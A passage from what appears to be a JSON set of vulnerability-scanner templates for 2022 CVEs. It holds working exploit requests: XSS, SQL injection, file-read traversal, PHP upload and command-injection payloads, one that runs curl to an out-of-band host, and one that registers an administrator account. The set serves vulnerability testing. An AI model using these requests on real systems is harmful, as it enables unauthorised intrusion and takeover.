- Server-Side Request Forgery","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/idp/profile/oidc/authorize?client_id=demo_rp&request_uri=https://{{interactsh-url}}"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["ShibbolethIdp"]}]}]},{"id":"CVE-2022-45933","info":{"name":"KubeView <=0.1.31 - Information Disclosure","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/scrape/kube-system"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["BEGIN CERTIFICATE","END CERTIFICATE","kubernetes.io"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-46381","info":{"name":"Linear eMerge E3-Series - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/badging/badge_template_v0.php?layout=1&type=\"/><svg/onload=\"alert(document.domain)\"/>"],"matchers-condition":"and","matchers":[{"type":"word","words":["<svg/onload=\"alert(document.domain)\"/>","Badging Template"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-1597","info":{"name":"WordPress WPQA <5.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0\nContent-Type: application/x-www-form-urlencoded\n\nuser_name={{user}}&email={{user}}@{{Host}}&pass1={{pass}}&pass2={{pass}}&phone={{rand_text_numeric(10)}}&agree_terms=on&form_type=wpqa-signup&action=wpqa_ajax_signup_process\n","POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0\nContent-Type: application/x-www-form-urlencoded\n\nuser_mail={{user}}@{{Host}}&form_type=wpqa_forget&action=wpqa_ajax_password_process&redirect_to={{url_encode(redirect_to)}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{redirect_to}}","\"success\":1"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-29005","info":{"name":"Online Birth Certificate System 1.2 - Stored Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /obcs/user/login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nmobno={{username}}&password={{password}}&login=\n","POST /obcs/user/profile.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nfname={{str}}%3Cscript%3Ealert%28document.domain%29%3B%3C%2Fscript%3E&lname={{str}}%3Cscript%3Ealert%28document.domain%29%3B%3C%2Fscript%3E&add=New+Delhi+India+110001&submit=\n","GET /obcs/user/dashboard.php HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"req-condition":true,"host-redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["contains(header_3, \"text/html\")","status_code_3 == 200","contains(body_3, 'admin-name\\\">{{str}}<script>alert(document.domain);</script>')"],"condition":"and"}]}]},{"id":"CVE-2022-2376","info":{"name":"WordPress Directorist <7.3.1 - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=directorist_author_pagination"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["directorist-authors__card__details__top","directorist-authors__card__info-list"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-4328","info":{"name":"WooCommerce Checkout Field Manager < 18.0 - Arbitrary File Upload","severity":"critical"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php?action=cfom_upload_file&name={{randstr}}.pHp HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=------------------------22728be7b3104597\n\n--------------------------22728be7b3104597\nContent-Disposition: form-data; name=\"file\"; filename=\"{{randstr}}.php\"\nContent-Type: application/octet-stream\n\n<?php echo md5(\"CVE-2022-4328\"); ?>\n\n--------------------------22728be7b3104597--\n","GET /wp-content/uploads/cfom_files/{{to_lower('{{randstr}}')}}.php HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["fe5df26ce4ca0056ffae8854469c282f"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-36804","info":{"name":"Atlassian Bitbucket - Remote Command Injection","severity":"high"},"requests":[{"raw":["GET /rest/api/latest/repos HTTP/1.1\nHost: {{Hostname}}\n","GET /rest/api/latest/projects/{{key}}/repos/{{slug}}/archive?filename={{data}}&at={{data}}&path={{data}}&prefix=ax%00--exec=%60id%60%00--remote=origin HTTP/1.1\nHost: {{Hostname}}\n"],"stop-at-first-match":true,"iterate-all":true,"matchers-condition":"and","matchers":[{"type":"word","words":["com.atlassian.bitbucket.scm.CommandFailedException"]},{"type":"status","status":[500]}],"extractors":[{"type":"json","name":"key","internal":true,"json":[".[\"values\"] | .[] | .[\"project\"] | .key"],"part":"body"},{"type":"json","name":"slug","internal":true,"json":[".[\"values\"] | .[]  | .slug"],"part":"body"},{"type":"regex","group":1,"regex":["uid=.*\\(([a-z]+)\\):"]}]}]},{"id":"CVE-2022-37190","info":{"name":"Cuppa CMS v1.0 - Remote Code Execution","severity":"high"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nuser={{username}}&password={{password}}&language=en&task=login\n","POST /components/table_manager/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\npath=component%2Ftable_manager%2Fview%2Fcu_api_keys\n","POST /api/index.php HTTP/1.1\nHost: {{Hostname}}\nkey: {{apikey}}\nContent-Type: application/x-www-form-urlencoded\n\naction=system&function=exec&cmd=cat+/etc/passwd\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"header_3","words":["text/html"]},{"type":"regex","regex":["postgres:.*:1001:","root:.*:0:0:"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"apikey","group":1,"regex":["<td class='td_key'>(.*?)</td>"],"internal":true}]}]},{"id":"CVE-2022-1933","info":{"name":"WordPress CDI <5.1.9 - Cross Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=cdi_collect_follow&trk=%3Cscript%3Ealert(document.domain)%3C/script%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>","Tracking code not correct"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-38817","info":{"name":"Dapr Dashboard 0.1.0-0.10.0 - Improper Access Control","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/components/statestore","{{BaseURL}}/overview","{{BaseURL}}/controlplane"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<title>Dapr Dashboard</title>"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0422","info":{"name":"WordPress White Label CMS <2.2.9 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php?wlcms-action=preview HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nwlcms%5B_login_custom_js%5D=alert%28%2FXSS%2F%29%3B\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["alert(/XSS/);"]},{"type":"word","part":"body","words":["wlcms-login-wrapper"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-31373","info":{"name":"SolarView Compact 6.00 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/Solar_AiConf.php/%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["/Solar_AiConf.php/\"><script>alert(document.domain)</script>","HREF=\"Solar_Service.php\""],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0441","info":{"name":"MasterStudy LMS <2.7.6 - Improper Access Control","severity":"critical"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n","POST /wp-admin/admin-ajax.php?action=stm_lms_register&nonce={{nonce}} HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\nContent-Type: application/json\n\n{\"user_login\":\"{{username}}\",\"user_email\":\"{{user_email}}\",\"user_password\":\"{{password}}\",\"user_password_re\":\"{{password}}\",\"become_instructor\":\"\",\"privacy_policy\":true,\"degree\":\"\",\"expertize\":\"\",\"auditory\":\"\",\"additional\":[],\"additional_instructors\":[],\"profile_default_fields_for_register\":{\"wp_capabilities\":{\"value\":{\"administrator\":1}}}}\n"],"req-condition":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["Registration completed successfully","\"status\":\"success\""],"condition":"and"},{"type":"word","part":"header_2","words":["application/json;"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["\"stm_lms_register\":\"([0-9a-z]+)\""],"internal":true},{"type":"kval","kval":["user_email","password"]}]}]},{"id":"CVE-2022-29548","info":{"name":"WSO2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/carbon/admin/login.jsp?loginStatus=false&errorCode=%27);alert(document.domain)//"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["CARBON.showWarningDialog('???');alert(document.domain)//???"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-1952","info":{"name":"WordPress eaSYNC Booking <1.1.16 - Arbitrary File Upload","severity":"critical"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nCookie: PHPSESSID=a0d5959357e474aef655313f69891f37\nContent-Type: multipart/form-data; boundary=------------------------98efee55508c5059\n\n--------------------------98efee55508c5059\nContent-Disposition: form-data; name=\"action\"\n\neasync_session_store\n--------------------------98efee55508c5059\nContent-Disposition: form-data; name=\"type\"\n\ncar\n--------------------------98efee55508c5059\nContent-Disposition: form-data; name=\"with_driver\"\n\nself-driven\n--------------------------98efee55508c5059\nContent-Disposition: form-data; name=\"driver_license_image2\"; filename=\"{{randstr}}.php\"\nContent-Type: application/octet-stream\n\n<?php echo md5('CVE-2022-1952');?>\n\n--------------------------98efee55508c5059--\n","GET /wp-admin/admin-ajax.php?action=easync_success_and_save HTTP/1.1\nHost: {{Hostname}}\nCookie: PHPSESSID=a0d5959357e474aef655313f69891f37\n","GET /wp-content/uploads/{{filename}}.php HTTP/1.1\nHost: {{Hostname}}\n"],"req-condition":true,"matchers":[{"type":"dsl","dsl":["contains(header_3, \"text/html\")","status_code_3 == 200","contains(body_1, 'success\\\":true')","contains(body_3, 'e0d7fcf2c9f63143b6278a3e40f6bea9')"],"condition":"and"}],"extractors":[{"type":"regex","name":"filename","group":1,"regex":["wp-content\\\\\\/uploads\\\\\\/([0-9a-zA-Z]+).php"],"internal":true}]}]},{"id":"CVE-2022-0220","info":{"name":"WordPress GDPR & CCPA <1.9.27 -  Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-admin HTTP/1.1\nHost: {{Hostname}}\n","POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=check_privacy_settings&settings%5B40%5D=40&settings%5B41%5D=%3cbody%20onload%3dalert(document.domain)%3e&nonce={{nonce}}\n"],"req-condition":true,"host-redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["contains(header_2, 'text/html')","status_code_2 == 200","contains(body_2, '<body onload=alert(document.domain)>') && contains(body_2, '/wp-content/plugins/')"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["nonce\":\"([0-9a-z]+)"],"internal":true,"part":"body"}]}]},{"id":"CVE-2022-43185","info":{"name":"Rukovoditel <= 3.2.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /index.php?module=users/login HTTP/1.1\nHost: {{Hostname}}\n","POST /index.php?module=users/login&action=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&username={{username}}&password={{password}}\n","POST /index.php?module=holidays/holidays&action=save&token={{nonce}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&start_date=2023-05-22&end_date=2023-05-31\n"],"cookie-reuse":true,"redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(content_type_3, \"text/html\")","contains(body_3, \"<script>alert(document.domain)</script>\")","contains(body_3, \"rukovoditel\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["id=\"form_session_token\" value=\"(.*)\" type=\"hidden\""],"internal":true}]}]},{"id":"CVE-2022-32026","info":{"name":"Car Rental Management System 1.0 - SQL Injection","severity":"high"},"requests":[{"raw":["POST /admin/ajax.php?action=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}&password={{password}}\n","GET /admin/manage_booking.php?id=-1%20union%20select%201,2,3,4,5,6,md5({{num}}),8,9,10,11--+ HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"skip-variables-check":true,"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{md5({{num}})}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-1756","info":{"name":"Newsletter < 7.4.5 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=newsletter_main_index&debug&\"><svg/onload=alert(/document.domain/)> HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(body, \"newsletter\") && contains(body, \"><svg/onload=alert(/document.domain/)>\")"],"condition":"and"}]}]},{"id":"CVE-2022-0928","info":{"name":"Microweber < 1.2.12 - Stored Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /api/user_login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}&password={{password}}\n","POST /api/shop/save_tax_item HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nReferer: {{BaseURL}}/admin/view:settings\n\nid=0&name=vat1&type=\"><img+src%3dx+onerror%3dalert(document.domain)>&rate=10\n","POST /module HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nReferer:{{BaseURL}}/admin/view:settings\n\nclass=+module+module-shop-taxes-admin-list-taxes+&id=mw_admin_shop_taxes_items_list&parent-module-id=settings-admin-mw-main-module-backend-shop-taxes-admin&parent-module=shop%2Ftaxes%2Fadmin&data-type=shop%2Ftaxes%2Fadmin_list_taxes\n"],"cookie-reuse":true,"req-condition":true,"matchers":[{"type":"dsl","dsl":["contains(body_3,\"<img src=x onerror=alert(document.domain)></td>\")","contains(header_3,\"text/html\")","status_code_2 == 200 && status_code_3 == 200"],"condition":"and"}]}]},{"id":"CVE-2022-28363","info":{"name":"Reprise License Manager 14.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/goform/login_process?username=test%22%3E%3Csvg/onload=alert(document.domain)%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<svg/onload=alert(document.domain)>","Login Failed"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0271","info":{"name":"LearnPress <4.1.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=lp_background_single_email&lp-dismiss-notice=xxx<img%20src=x%20onerror=alert(document.domain)>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{\"dismissed\":\"xxx<img src=x onerror=alert(document.domain)>\"}"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-3980","info":{"name":"Sophos Mobile managed on-premises - XML External Entity Injection","severity":"critical"},"requests":[{"raw":["@timeout: 50s\nPOST /servlets/OmaDsServlet HTTP/1.1\nHost: {{Hostname}}\nContent-Type: \"application/xml\"\n\n<?xml version=\"1.0\"?>\n<!DOCTYPE cdl [<!ENTITY % test SYSTEM \"http://{{interactsh-url}}\">%test;]>\n<cdl>test</cdl>\n"],"redirects":true,"max-redirects":3,"matchers":[{"type":"dsl","dsl":["contains(interactsh_protocol, 'http') || contains(interactsh_protocol, 'dns')","status_code == 400","len(body) == 0"],"condition":"and"}]}]},{"id":"CVE-2022-4301","info":{"name":"WordPress Sunshine Photo Cart <2.9.15 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-login.php?action=register&redirect_to=x%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>","Registration Form"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-28022","info":{"name":"Purchase Order Management v1.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /classes/Master.php?f=delete_item HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nid=test'+AND+(SELECT+2844+FROM+(SELECT(SLEEP(6)))FDTM)+AND+'sWZA'='sWZA\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(header, \"text/html\")","contains(body, \"status\\\":\\\"success\")"],"condition":"and"}]}]},{"id":"CVE-2022-23854","info":{"name":"AVEVA InTouch Access Anywhere Secure Gateway - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/AccessAnywhere/%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255cwindows%255cwin.ini"],"matchers-condition":"and","matchers":[{"type":"word","words":["for 16-bit app support","extensions"],"condition":"and"},{"type":"word","part":"header","words":["EricomSecureGateway"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-23544","info":{"name":"MeterSphere < 2.5.0 SSRF","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/resource/md/get/url?url=http://oast.pro"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Interactsh Server"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-31474","info":{"name":"BackupBuddy - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-post.php?page=pb_backupbuddy_destinations&local-destination-id=/etc/passwd&local-download=/etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-32772","info":{"name":"WWBN AVideo 11.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?msg=%3C%2Fscript%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["avideoAlertInfo(\"</script><script>alert(document.cookie);</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-2219","info":{"name":"Unyson < 2.7.27 - Cross Site Scripting","severity":"high"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=fw-extensions&sub-page=extension&extension=feedback<script>alert(document.domain)</script>  HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"redirects":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"script%3Ealert%28document.domain%29%3C%2Fscript%3\")","contains(body_2, \"Unyson\")"],"condition":"and"}]}]},{"id":"CVE-2022-0208","info":{"name":"WordPress Plugin MapPress <2.73.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?mapp_iframe=1&mapid=--%3E%3Cimg%20src%20onerror=alert(document.domain)%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html"]},{"type":"word","part":"body","words":["<img src onerror=alert(document.domain)>","Bad mapid"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-3933","info":{"name":"WordPress Essential Real Estate <3.9.6 - Authenticated Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin-ajax.php?action=ere_property_gallery_fillter_ajax&columns_gap=%22%3E%3Cscript%3Ealert(document.domain);%3C/script%3E%3C!-- HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"><script>alert(document.domain)</script>\")","contains(body_2, \"ere_property_gallery\")"],"condition":"and"}]}]},{"id":"CVE-2022-25323","info":{"name":"ZEROF Web Server 2.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/admin.back<img%20src=x%20onerror=alert(document.domain)>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["back<img src=x onerror=alert(document.domain)>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[401]}]}]},{"id":"CVE-2022-43166","info":{"name":"Rukovoditel <= 3.2.1 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["GET /index.php?module=users/login HTTP/1.1\nHost: {{Hostname}}\n","POST /index.php?module=users/login&action=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&username={{username}}&password={{password}}\n","POST /index.php?module=entities/&action=save&token={{nonce}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&group_id=&name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&sort_order=0&notes=\n"],"cookie-reuse":true,"redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(content_type_3, \"text/html\")","contains(body_3, \"<script>alert(document.domain)</script>\")","contains(body_3, \"rukovoditel\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["id=\"form_session_token\" value=\"(.*)\" type=\"hidden\""],"internal":true}]}]},{"id":"CVE-2022-30525","info":{"name":"Zyxel Firewall - OS Command Injection","severity":"critical"},"requests":[{"raw":["POST /ztp/cgi-bin/handler HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"command\":\"setWanPortSt\",\"proto\":\"dhcp\",\"port\":\"4\",\"vlan_tagged\":\"1\",\"vlanid\":\"5\",\"mtu\":\"; curl {{interactsh-url}};\",\"data\":\"hi\"}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"status","status":[500]}]}]},{"id":"CVE-2022-2633","info":{"name":"All-In-One Video Gallery <=2.6.0 - Server-Side Request Forgery","severity":"high"},"requests":[{"raw":["@timeout: 10s\nGET /index.php/video/?dl={{base64('https://oast.me/')}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Interactsh Server"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-29301","info":{"name":"SolarView Compact 6.00 - 'pow' Cross-Site Scripting","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/Solar_SlideSub.php?id=4&play=1&pow=sds%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E%3C%22&bgcolor=green"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script><\"\">","SolarView"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-35914","info":{"name":"GLPI <=10.0.2 - Remote Command Execution","severity":"critical"},"requests":[{"raw":["POST /vendor/htmlawed/htmlawed/htmLawedTest.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nCookie: sid=foo\n\nsid=foo&hhook=exec&text={{cmd}}\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-25486","info":{"name":"Cuppa CMS v1.0 - Local File Inclusion","severity":"high"},"requests":[{"raw":["POST /alerts/alertConfigField.php  HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nurlConfig=../../../../../../../../../etc/passwd\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-39960","info":{"name":"Jira Netic Group Export <1.0.3 - Missing Authorization","severity":"medium"},"requests":[{"raw":["POST /plugins/servlet/groupexportforjira/admin/json HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ngroupexport_searchstring=&groupexport_download=true\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"jiraGroupObjects\"","\"groupName\""],"condition":"and"},{"type":"word","part":"header","words":["attachment","jira-group-export"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-43170","info":{"name":"Rukovoditel <= 3.2.1 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["GET /index.php?module=users/login HTTP/1.1\nHost: {{Hostname}}\n","POST /index.php?module=users/login&action=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&username={{username}}&password={{password}}\n","POST /index.php?module=dashboard_configure/index&action=save&token={{nonce}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&type=info_block&is_active=1&sections_id=0&color=default&name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&icon=&description=&sort_order=\n"],"cookie-reuse":true,"redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(content_type_3, \"text/html\")","contains(body_3, \"<script>alert(document.domain)</script>\")","contains(body_3, \"rukovoditel\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["id=\"form_session_token\" value=\"(.*)\" type=\"hidden\""],"internal":true}]}]},{"id":"CVE-2022-2462","info":{"name":"WordPress Transposh <=1.0.8.1 - Information Disclosure","severity":"medium"},"requests":[{"method":"POST","path":["{{BaseURL}}/wp-admin/admin-ajax.php"],"body":"action=tp_history&token=&lang=en","headers":{"Content-Type":"application/x-www-form-urlencoded"},"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["len(transposh) > 0"]},{"type":"word","part":"body","words":["translated","translated_by","timestamp","source","user_login"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0788","info":{"name":"WordPress WP Fundraising Donation and Crowdfunding Platform <1.5.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 10s\nGET /index.php?rest_route=/xs-donate-form/payment-redirect/3 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"id\": \"(SELECT 1 FROM (SELECT(SLEEP(6)))me)\", \"formid\": \"1\", \"type\": \"online_payment\"}\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(content_type, \"application/json\")","contains(body, \"Invalid payment.\")"],"condition":"and"}]}]},{"id":"CVE-2022-0885","info":{"name":"Member Hero <=1.0.9 - Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=memberhero_send_form&_memberhero_hook=phpinfo"],"matchers-condition":"and","matchers":[{"type":"word","words":["PHP Extension","PHP Version","<!DOCTYPE html"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","group":1,"regex":[">PHP Version <\\/td><td class=\"v\">([0-9.]+)"],"part":"body"}]}]},{"id":"CVE-2022-28032","info":{"name":"Atom CMS v2.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 20s\nGET /admin/ajax/pages.php?id=(sleep(6)) HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(body, \"Page Deleted\")"],"condition":"and"}]}]},{"id":"CVE-2022-0824","info":{"name":"Webmin <1.990 - Improper Access Control","severity":"high"},"requests":[{"raw":["POST /session_login.cgi HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nCookie: redirect=1;testing=1;PHPSESSID=;\n\nuser={{username}}&pass={{password}}\n","POST 